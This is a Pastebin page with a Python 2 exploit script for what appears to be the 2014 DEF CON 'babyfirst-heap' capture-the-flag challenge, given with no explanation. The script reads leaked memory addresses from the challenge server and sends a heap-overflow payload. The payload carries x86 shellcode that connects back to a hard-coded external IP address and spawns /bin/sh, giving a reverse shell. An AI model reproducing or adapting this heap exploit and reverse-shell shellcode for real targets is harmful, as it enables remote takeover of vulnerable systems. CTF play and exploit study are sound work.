Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import hashlib, binascii, sys, socket, re, random, struct, base64
- def readline(s, show = True):
- out = ""
- while len(out) == 0 or out[-1] != "\n":
- data = s.recv(1)
- if len(data) == 0:
- print "Server disconnected"
- exit()
- out += data
- if show:
- print repr(out[:-1])
- return out[:-1]
- def main():
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- #s.connect(("10.0.0.62", 1234))
- s.connect(("babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c.2014.shallweplayaga.me", 4088))
- for i in xrange(6):
- readline(s)
- res = readline(s)
- addr = int(res[28:35], 16) - 4
- target_addr = struct.pack("<L", addr)
- for i in xrange(10):
- readline(s)
- res = readline(s)
- addr = int(res[12:19], 16)
- base_addr = struct.pack("<L", addr)
- code = "\xeb\x10" + "\x90" * 24 + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68" + chr(212) +chr(251) + chr(154) + chr(61) + "\x66\x68\x30\x39\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb3\x03\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"
- code = code.ljust(260, "A")
- fullcode = code + "\x21\x00\x00\x00" + "A" * 28 + "\x21\x00\x00\x00" + "A" * 28 + "\x39\x03\x00\x00" + base_addr + target_addr + "A" * 808 + "\x38\x03\x00\x00" + "\xe8\x04\x00\x00" + "\n"
- open("foo3.bin", "wb").write(fullcode)
- s.send(fullcode)
- while True:
- readline(s)
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
